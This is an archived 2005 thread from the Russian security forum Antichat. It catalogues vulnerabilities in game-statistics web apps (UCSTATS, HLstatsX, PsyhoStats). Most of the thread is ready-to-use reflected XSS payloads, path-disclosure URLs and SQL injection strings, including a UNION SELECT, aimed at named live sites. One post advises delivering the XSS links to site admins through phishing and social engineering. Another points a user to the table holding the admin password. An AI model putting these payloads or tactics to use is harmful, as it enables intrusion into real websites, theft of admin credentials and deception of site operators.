ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
Уязвимости игровых статистик |

16.09.2005, 21:01
|
|
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме: 2260903
Репутация:
345
|
|
Уязвимости игровых статистик
UCSTATS 1.1
Пример: http://cs.shadowzone.ru/stats/
Код HTML:
XSS пассивный
stats.php?game=<script>alert();</script>
stats.php?q=search&query=%22%3E%3Cscript%3Ealert();</script>&qtype=name
Полное раскрытие пути
stats.php?game=../..
[url]http://cs.shadowzone.ru/stats/stats.php?game=cstrike&q=player&uid=cec315cf55f1af878ce9cd8b852dc4fd§ion=weapons&sort=-1&dir=-1[/url]
[url]http://cs.shadowzone.ru/stats/stats.php?game=cstrike&q=player&uid=cec315cf55f1af878ce9cd8b852dc4fd§ion=maps&sort=map&dir=-1[/url]
пассивный SQL-inj
stats.php?game=cstrike&q=player&uid=верный юид§ion=weapons&sort=weapon_kills_percent&dir=asc1
[url]http://cs.shadowzone.ru/stats/stats.php?game=cstrike&q=player&uid=cec315cf55f1af878ce9cd8b852dc4fd§ion=weapons&sort=weapon_kills_percent&dir=asc1[/url]
Что-то наклёвывается SQL
[url]http://cs.shadowzone.ru/stats/stats.php?game=cstrike&q=awards&month=2&year=-1%20UNION%20SELECT%20award_month,%20award_month%20FROM%20ucstats_awards%20WHERE%20GAME=cstrike%20AND%20award_year=2005%20ORDER%20BY%20award_month%20DESC/*[/url]
stats.php?game=cstrike&q=awards&month=2&year=[SQL]
HLstatsX RC 10
Пример: http://www.halflife2.ainet.at/hlstats.php
Код HTML:
XSS пассивный
hlstats.php?mode=admin в поле UserName вписать: "><script>
hlstats.php?mode=actioninfo&action=Dropped_The_Bomb<script>alert()</script>&game=css
hlstats.php?mode=mapinfo&map=<script>alert()</script>&game=css
hlstats.php?mode=search&q="><script>alert()</script><a%20scr="&st=player&game=css
hlstats.php?mode=search&q=2&st="><script>alert()</script><a%20scr="&game=css&sort=name1
PsyhoStats 2.3
Пример: http://www.cs-source.ru/stats/
Код HTML:
Полное раскрытие пути
imgskill.php?plrid=9&w=0
Если что-то еще нашли, постите
|
|
|

16.09.2005, 23:20
|
|
[ розовый мафиозо ]
Регистрация: 16.03.2005
Сообщений: 301
Провел на форуме: 1736355
Репутация:
241
|
|
da, ochen daje neplohaya podborka...
|
|
|

18.09.2005, 18:52
|
|
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме: 2260903
Репутация:
345
|
|
А использовать "пассивы" можно так....
Прислать письмо, либо в личку админу:
При этом он попадет не на http://cs.shadowzone.ru/stats/, а на страницу с кодом
А также можно: почему не заходит??? Или почему выдает ошибку????
Вобщем соц. инженерия,фишинг, если админ лох...
|
|
|

13.10.2005, 23:37
|
|
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме: 2260903
Репутация:
345
|
|
Раскрытие пути в PsyhoStats 2.3 с qPS 2.3.1 Mod 3 Final Full
PHP код:
http://www.cs-source.ru/stats/downloads.php?dir=1
и здесь же XSS
PHP код:
http://www.cs-source.ru/stats/downloads.php?dir=<script>alert()</script>
|
|
|
HLstatsX v 1.00 - Final (SQL-inj) |

17.12.2005, 13:23
|
|
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме: 2260903
Репутация:
345
|
|
HLstatsX v 1.00 - Final (SQL-inj)
======================# Продукт: #=======================
HLstatsX - Realtime player statistics
http://www.hlstatsx.com/
http://www.hlstatsx.com/downloads/HLstatsX_V1.00.zip
===================# Уязвимые версии: #===================
HLstatsX >= 1.00 Final
=======================# Описание: #======================
Скрипт playerinfo.inc вообще не фильтрует параметр
$killLimit, который присутствует в 2 SQL-запросах.
Это может быть использовано для удаленной SQL-инъеккции.
hlstats.php?mode=playerinfo&player=1&killLimit=[SQL]
======================# Интересно: #======================
Интересно то, что при выводе ошибки синтакса запроса,
выводится host и username SQL-базы! Как они не догадались
пароль выводить?
Provided by max_pain89
Последний раз редактировалось max_pain89; 17.12.2005 в 13:26..
|
|
|

21.12.2005, 01:02
|
|
Новичок
Регистрация: 21.11.2005
Сообщений: 16
Провел на форуме: 179908
Репутация:
-2
|
|
А неподскажешь какую sql команду выполнять и как будет выглядеть плз
|
|
|

21.12.2005, 13:19
|
|
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме: 2260903
Репутация:
345
|
|
там запрос
PHP код:
$result = $db->query("
SELECT
SUM(hlstats_Frags_Kills.headshot) as headshots
FROM
hlstats_Frags_Kills
GROUP BY
hlstats_Frags_Kills.playerId
HAVING
Count(hlstats_Frags_Kills.kills) >= $killLimit
");
но сам я сплойт написать не могу, знаю талько что пароль админа хранится тут
--
-- Таблица `hlstats_Users`
--
CREATE TABLE `hlstats_Users` (
`username` varchar(16) NOT NULL default '',
`password` varchar(32) NOT NULL default '',
`acclevel` int(11) NOT NULL default '0',
`playerId` int(11) NOT NULL default '0',
PRIMARY KEY (`username`)
) TYPE=MyISAM;
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|